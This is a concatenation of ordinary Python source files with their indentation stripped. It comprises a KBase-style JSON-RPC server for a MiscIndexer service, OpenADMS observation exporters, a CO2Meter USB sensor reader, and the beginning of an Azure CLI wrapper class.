if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'MiscIndexer'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from MiscIndexer.MiscIndexerImpl import MiscIndexer # noqa @IgnorePep8
impl_MiscIndexer = MiscIndexer(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
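    # Prefer the proxy-supplied X-Forwarded-For / X-Real-IP headers unless the
    # config explicitly opts out via dont_trust_x_ip_headers.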
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'MiscIndexer'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_MiscIndexer.assembly_index,
name='MiscIndexer.assembly_index',
types=[dict])
self.method_authentication['MiscIndexer.assembly_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.assemblycontig_index,
name='MiscIndexer.assemblycontig_index',
types=[dict])
self.method_authentication['MiscIndexer.assemblycontig_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.narrative_index,
name='MiscIndexer.narrative_index',
types=[dict])
self.method_authentication['MiscIndexer.narrative_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.ontologyterm_index,
name='MiscIndexer.ontologyterm_index',
types=[dict])
self.method_authentication['MiscIndexer.ontologyterm_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.pairedendlibrary_index,
name='MiscIndexer.pairedendlibrary_index',
types=[dict])
self.method_authentication['MiscIndexer.pairedendlibrary_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.pangenome_index,
name='MiscIndexer.pangenome_index',
types=[dict])
self.method_authentication['MiscIndexer.pangenome_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.pangenomeorthology_index,
name='MiscIndexer.pangenomeorthology_index',
types=[dict])
self.method_authentication['MiscIndexer.pangenomeorthology_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.rnaseqsampleset_index,
name='MiscIndexer.rnaseqsampleset_index',
types=[dict])
self.method_authentication['MiscIndexer.rnaseqsampleset_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.singleendlibrary_index,
name='MiscIndexer.singleendlibrary_index',
types=[dict])
self.method_authentication['MiscIndexer.singleendlibrary_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.taxon_index,
name='MiscIndexer.taxon_index',
types=[dict])
self.method_authentication['MiscIndexer.taxon_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.tree_index,
name='MiscIndexer.tree_index',
types=[dict])
self.method_authentication['MiscIndexer.tree_index'] = 'required' # noqa
self.rpc_service.add(impl_MiscIndexer.status,
name='MiscIndexer.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
        except ValueError:
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'MiscIndexer ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
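        # The local UTC offset is the difference between local and UTC "now";
        # adding 30 seconds rounds the offset to the nearest minute.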
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP server listening on
# port 9999 by default, execute this file.
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
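    """Run a single JSON-RPC call in CLI mode: read the request from
    input_file_path (e.g. {"method": "MiscIndexer.status", "params": [{}]};
    the exact params shape depends on the method and is an assumption here),
    write the JSON response to output_file_path, and return 500 as the exit
    code if the response contains an error."""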
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
export.py
|
#!/usr/bin/env python3.6
"""Module for the export of observations."""
__author__ = 'Philipp Engel'
__copyright__ = 'Copyright (c) 2017 Hochschule Neubrandenburg'
__license__ = 'BSD-2-Clause'
import copy
import threading
import time
from enum import Enum
from pathlib import Path
from typing import Any, Dict, Union
import arrow
# import requests
from tinydb import TinyDB
from tinydb.storages import MemoryStorage
from core.manager import Manager
from core.observation import Observation
from core.prototype import Prototype
class CloudExporter(Prototype):
"""
CloudExporter sends observation data to an OpenADMS Server instance.
    Observations are cached locally in case the service is temporarily not
    reachable and are then sent again. Caching can be done either in-memory or
    file-based. In-memory is faster and requires fewer I/O operations, but
    cached observations do not persist over restarts (data loss may occur).
The JSON-based configuration for this module:
Parameters:
url: URL of the OpenADMS Server instance.
user: User name for OpenADMS Server.
password: Password for OpenADMS Server.
authMethod: Authentication method (`basic` or `jwt`).
db: File name of the cache database (e.g.: `cache.json`).
storage: Storage type (`file` or `memory`).
Example:
The configuration may be::
{
"url": "https://api.examples.com/",
"user": "test",
"password": "secret",
"authMethod": "basic",
"db": "cache.json",
"storage": "file"
}
"""
def __init__(self, module_name: str, module_type: str, manager: Manager):
super().__init__(module_name, module_type, manager)
config = self.get_module_config(self._name)
self._url = config.get('url')
self._user = config.get('user')
self._password = config.get('password')
self._auth_method = config.get('authMethod')
self._storage = config.get('storage')
self._db_file = config.get('db')
self._jwt_token = None
self._thread = None
if self._storage not in ['file', 'memory']:
raise ValueError('Invalid storage method')
if self._storage == 'memory':
self._cache_db = TinyDB(storage=MemoryStorage)
self.logger.verbose('Created in-memory cache database')
if self._storage == 'file':
try:
self.logger.verbose(f'Opening local cache database '
f'"{self._db_file}" ...')
self._cache_db = TinyDB(self._db_file)
except Exception:
raise ValueError(f'Cache database "{self._db_file}" could not '
f'be opened')
def _cache_observation(self, obs: Observation) -> str:
"""Caches the given observation in the local cache database.
Args:
obs: Observation object.
"""
doc_id = self._cache_db.insert(obs.data)
self.logger.debug(f'Cached observation "{obs.get("name")}" of target '
f'"{obs.get("target")}" (doc id = {doc_id})')
return doc_id
def _get_cached_observation_data(self) -> Union[Dict[str, Any], None]:
""""Returns a random observation data set from the cache database.
Returns:
Observation data or None if cache is empty.
"""
if len(self._cache_db) > 0:
return self._cache_db.all()[0]
return None
def _remove_observation_data(self, doc_id: int) -> None:
"""Removes a single observations from the cache database.
Args:
doc_id: Document id.
"""
self._cache_db.remove(doc_ids=[doc_id])
self.logger.debug('Removed observation from cache database '
'(document id = {})'.format(doc_id))
def _transfer_observation_data(self, obs_data: Dict[str, Any]) -> bool:
# TODO this method is a mock
self.logger.info(f'Transferred observation "{obs_data.get("name")}" '
f'of target "{obs_data.get("target")}"')
return True
    def has_cached_observation_data(self) -> bool:
"""Returns whether or not a cached observation exists in the database.
Returns:
True if cached observation exists, False if not.
"""
        return len(self._cache_db) > 0
def process_observation(self, obs: Observation) -> Observation:
"""Caches observation object locally.
Args:
obs: Observation object.
Returns:
The observation object.
"""
self._cache_observation(copy.deepcopy(obs))
return obs
def run(self) -> None:
"""Sends cached observation to RESTful service."""
while self.is_running:
if not self.has_cached_observation_data():
time.sleep(1.0)
continue
if len(self._cache_db) > 500:
self.logger.warning('Cache stores > 500 observations')
# Send cached observation data to OpenADMS Server.
obs_data = self._get_cached_observation_data()
is_transferred = self._transfer_observation_data(obs_data)
if is_transferred:
# Remove the transferred observation data from cache.
self._remove_observation_data(obs_data.doc_id)
def start(self) -> None:
"""Starts the module."""
if self._is_running:
return
super().start()
self._thread = threading.Thread(target=self.run)
self._thread.daemon = True
self._thread.start()
class FileRotation(Enum):
"""
Enumeration of file rotation times of flat files.
"""
NONE = 0
DAILY = 1
MONTHLY = 2
YEARLY = 3
class FileExporter(Prototype):
"""
FileExporter writes sensor data to a flat file in CSV format.
The JSON-based configuration for this module:
Parameters:
dateTimeFormat (str): Format of date and time (see `arrow` library).
fileExtension (str): Extension of the file (``.txt`` or ``.csv``).
fileName (str): File name with optional placeholders ``{{date}}``,
``{{target}}``, ``{{name}}``, ``{{port}}``.
fileRotation (str): Either ``none``, ``daily``, ``monthly``, or
``yearly``.
paths (List[str]): Paths to save files to (multiple paths possible).
separator (str): Separator between values within the CSV file.
"""
def __init__(self, module_name: str, module_type: str, manager: Manager):
super().__init__(module_name, module_type, manager)
config = self.get_module_config(self._name)
self._file_extension = config.get('fileExtension')
self._file_name = config.get('fileName')
self._file_rotation = {
'none': FileRotation.NONE,
'daily': FileRotation.DAILY,
'monthly': FileRotation.MONTHLY,
'yearly': FileRotation.YEARLY
}.get(config.get('fileRotation'))
self._date_time_format = config.get('dateTimeFormat')
self._separator = config.get('separator')
self._paths = config.get('paths')
self._save_observation_id = config.get('saveObservationId')
def process_observation(self, obs: Observation) -> Observation:
"""Appends data to a flat file in CSV format.
Args:
obs: Observation object.
Returns:
The observation object.
"""
ts = arrow.get(obs.get('timestamp', 0))
file_date = {
# No file rotation, i.e., all data is stored in a single file.
FileRotation.NONE: None,
# Every day a new file is created.
FileRotation.DAILY: ts.format('YYYY-MM-DD'),
# Every month a new file is created.
FileRotation.MONTHLY: ts.format('YYYY-MM'),
# Every year a new file is created.
FileRotation.YEARLY: ts.format('YYYY')
}[self._file_rotation]
fn = self._file_name
fn = fn.replace('{{port}}', obs.get("portName"))
fn = fn.replace('{{date}}', f'{file_date}'
if file_date else '')
fn = fn.replace('{{target}}', f'{obs.get("target")}'
if obs.get('target') is not None else '')
fn = fn.replace('{{name}}', f'{obs.get("name")}'
if obs.get('name') is not None else '')
fn += self._file_extension
for path in self._paths:
if not Path(path).exists():
self.logger.critical(f'Path "{path}" does not exist')
continue
file_path = Path(path, fn)
# Create a header if a new file has to be touched.
header = None
if not Path(file_path).is_file():
header = (f'# Target "{obs.get("target")}" of '
f'"{obs.get("sensorName")}" on '
f'"{obs.get("portName")}"\n')
# Open a file for each path.
with open(str(file_path), 'a') as fh:
# Add the header if necessary.
if header:
fh.write(header)
# Format the time stamp. For more information, see:
# http://arrow.readthedocs.io/en/latest/#tokens
date_time = ts.format(self._date_time_format)
# Create the CSV line starting with date and time.
line = date_time
if self._save_observation_id:
line += self._separator + obs.get('id')
if obs.get('target') is not None:
line += self._separator + obs.get('target')
response_sets = obs.get('responseSets')
for response_set_id in sorted(response_sets.keys()):
response_set = response_sets.get(response_set_id)
v = response_set.get('value')
u = response_set.get('unit')
line += self._separator + format(response_set_id)
line += self._separator + format(v)
line += self._separator + format(u)
# Write line to file.
fh.write(line + '\n')
self.logger.info(f'Saved observation "{obs.get("name")}" of '
f'target "{obs.get("target")}" from port '
f'"{obs.get("portName")}" to file '
f'"{str(file_path)}"')
return obs
class RealTimePublisher(Prototype):
"""
RealTimePublisher forwards incoming `Observation` objects to a list of
receivers.
The JSON-based configuration for this module:
Parameters:
receivers (List): List of modules to send the observation to.
enabled (bool): Turns processing of observations on or off.
"""
def __init__(self, module_name: str, module_type: str, manager: Manager):
super().__init__(module_name, module_type, manager)
config = self.get_module_config(self._name)
self._receivers = config.get('receivers')
self._is_enabled = config.get('enabled')
def process_observation(self, obs: Observation) -> Observation:
if not self._is_enabled:
return obs
for receiver in self._receivers:
obs_copy = copy.deepcopy(obs)
target = f'{receiver}/{obs_copy.get("target")}'
obs_copy.set('nextReceiver', 0)
obs_copy.set('receivers', [target])
self.logger.debug(f'Publishing observation '
f'"{obs_copy.get("name")}" of target '
f'"{obs_copy.get("target")}" to "{target}"')
header = Observation.get_header()
payload = obs_copy.data
self.publish(target, header, payload)
return obs
|
CO2Meter.py
|
"""
Module for reading out CO2Meter USB devices
via a hidraw device under Linux
"""
import sys
import fcntl
import threading
import weakref
CO2METER_CO2 = 0x50
CO2METER_TEMP = 0x42
CO2METER_HUM = 0x41
HIDIOCSFEATURE_9 = 0xC0094806
def _co2_worker(weak_self):
"""
Worker thread that constantly reads from the usb device.
"""
while True:
self = weak_self()
if self is None:
break
self._read_data()
if not self._running:
break
del self
class CO2Meter:
_key = [0xc4, 0xc6, 0xc0, 0x92, 0x40, 0x23, 0xdc, 0x96]
_device = ""
_values = {}
_file = ""
_running = True
_callback = None
def __init__(self, device="/dev/hidraw0", callback=None):
self._device = device
self._callback = callback
self._file = open(device, "a+b", 0)
if sys.version_info >= (3,):
set_report = [0] + self._key
fcntl.ioctl(self._file, HIDIOCSFEATURE_9, bytearray(set_report))
else:
set_report_str = "\x00" + "".join(chr(e) for e in self._key)
fcntl.ioctl(self._file, HIDIOCSFEATURE_9, set_report_str)
thread = threading.Thread(target=_co2_worker, args=(weakref.ref(self),))
thread.daemon = True
thread.start()
def _read_data(self):
"""
Function that reads from the device, decodes it, validates the checksum
and adds the data to the dict _values.
Additionally calls the _callback if set
"""
try:
result = self._file.read(8)
if sys.version_info >= (3,):
data = list(result)
else:
data = list(ord(e) for e in result)
            if data[4] != 0x0d:
                # Newer devices don't encrypt the data; if byte 4 != 0x0d,
                # assume the data is encrypted and decrypt it.
                data = self._decrypt(data)
if data[4] != 0x0d or (sum(data[:3]) & 0xff) != data[3]:
print(self._hd(data), "Checksum error")
return
operation = data[0]
val = data[1] << 8 | data[2]
self._values[operation] = self._convert_value(operation, val)
if self._callback is not None:
if operation in {CO2METER_CO2, CO2METER_TEMP} or (operation == CO2METER_HUM and val != 0):
self._callback(sensor=operation, value=val)
        except Exception:
            self._running = False
def _decrypt(self, data):
"""
The received data has some weak crypto that needs to be decoded first
"""
cstate = [0x48, 0x74, 0x65, 0x6D, 0x70, 0x39, 0x39, 0x65]
shuffle = [2, 4, 0, 7, 1, 6, 5, 3]
phase1 = [0] * 8
for i, j in enumerate(shuffle):
phase1[j] = data[i]
phase2 = [0] * 8
for i in range(8):
phase2[i] = phase1[i] ^ self._key[i]
phase3 = [0] * 8
for i in range(8):
phase3[i] = ((phase2[i] >> 3) | (phase2[(i - 1 + 8) % 8] << 5)) & 0xff
ctmp = [0] * 8
for i in range(8):
ctmp[i] = ((cstate[i] >> 4) | (cstate[i] << 4)) & 0xff
out = [0] * 8
for i in range(8):
out[i] = (0x100 + phase3[i] - ctmp[i]) & 0xff
return out
@staticmethod
def _convert_value(sensor, value):
""" Apply Conversion of value dending on sensor type """
if sensor == CO2METER_TEMP:
return round(value / 16.0 - 273.1, 1)
if sensor == CO2METER_HUM:
return round(value / 100.0, 1)
return value
@staticmethod
def _hd(data):
""" Helper function for printing the raw data """
return " ".join("%02X" % e for e in data)
def get_co2(self):
"""
read the co2 value from _values
:returns dict with value or empty
"""
if not self._running:
raise IOError("worker thread couldn't read data")
result = {}
if CO2METER_CO2 in self._values:
result = {'co2': self._values[CO2METER_CO2]}
return result
def get_temperature(self):
"""
reads the temperature from _values
:returns dict with value or empty
"""
if not self._running:
raise IOError("worker thread couldn't read data")
result = {}
if CO2METER_TEMP in self._values:
result = {'temperature': self._values[CO2METER_TEMP]}
return result
def get_humidity(self): # not implemented by all devices
"""
        reads the humidity from _values.
        not all devices support this but might still return a value of 0,
        so values of 0 are discarded.
:returns dict with value or empty
"""
if not self._running:
raise IOError("worker thread couldn't read data")
result = {}
if CO2METER_HUM in self._values and self._values[CO2METER_HUM] != 0:
result = {'humidity': self._values[CO2METER_HUM]}
return result
def get_data(self):
"""
get all currently available values
:returns dict with value or empty
"""
result = {}
result.update(self.get_co2())
result.update(self.get_temperature())
result.update(self.get_humidity())
return result
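# Example usage (a minimal sketch; the hidraw path depends on your system):
# meter = CO2Meter("/dev/hidraw0")
# print(meter.get_data())  # e.g. {'co2': 600, 'temperature': 21.4}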
|
azurecli.py
|
from iotedgedev.connectionstring import IoTHubConnectionString
import json
import os
import signal
import subprocess
import sys
from io import StringIO
from threading import Thread, Timer
from azure.cli.core import get_default_cli
from fstrings import f
from queue import Empty, Queue
from . import telemetry
output_io_cls = StringIO
def get_query_argument_for_id_and_name(token):
return "[?starts_with(@.id,'{0}') || contains(@.name,'{1}')]".format(token.lower(), token)
class AzureCli:
def __init__(self, output, envvars, cli=get_default_cli()):
self.output = output
self.envvars = envvars
self.az_cli = cli
self.process = None
self._proc_terminated = False
def decode(self, val):
return val.decode("utf-8").strip()
def is_posix(self):
return self.envvars.is_posix()
def prepare_az_cli_args(self, args, suppress_output=False):
if suppress_output:
args.extend(["--query", "\"[?n]|[0]\""])
az_args = ["az"] + args
return az_args
def invoke_az_cli_outproc(self, args, error_message=None, stdout_io=None, stderr_io=None, suppress_output=False, timeout=None):
try:
if timeout:
timeout = int(timeout)
monitor_events = False
if 'monitor-events' in args:
monitor_events = True
self._proc_terminated = False
# Consider using functools
if monitor_events:
process = subprocess.Popen(self.prepare_az_cli_args(args, suppress_output),
shell=not self.is_posix(),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=os.setsid if self.is_posix() else None,
creationflags=subprocess.CREATE_NEW_PROCESS_GROUP if not self.is_posix() else 0)
elif stdout_io or stderr_io:
process = subprocess.Popen(self.prepare_az_cli_args(args, suppress_output),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=not self.is_posix())
else:
process = subprocess.Popen(self.prepare_az_cli_args(args, suppress_output),
shell=not self.is_posix())
self.process = process
timer = None
if timeout:
                # This Timer will attempt to be accurate, but it's not always the case in practice
timer = Timer(float(timeout),
self._terminate_process_tree,
args=['Timeout set to {0} seconds, which expired as expected.'.format(timeout)])
try:
if timer:
timer.start()
if not monitor_events:
stdout_data, stderr_data = process.communicate()
else:
return self._handle_monitor_event_process(process)
finally:
if timer:
timer.cancel()
if stderr_data and b"invalid_grant" in stderr_data:
self.output.error(self.decode(stderr_data))
self.output.info(
"Your Azure CLI session has expired. Please re-run `iotedgedev iothub setup` to refresh your credentials.")
self.logout()
sys.exit()
            if stdout_io and stdout_data:
                stdout_io.writelines(self.decode(stdout_data))
            if stderr_io and stderr_data:
                stderr_io.writelines(self.decode(stderr_data))
if process.returncode != 0:
if error_message:
self.output.error(error_message)
self.output.line()
return False
if not stdout_io and not stderr_io:
self.output.line()
except Exception as e:
if error_message:
self.output.error(error_message)
self.output.error(str(e))
self.output.line()
return False
return True
def _enqueue_stream(self, stream, queue):
try:
while not self._proc_terminated:
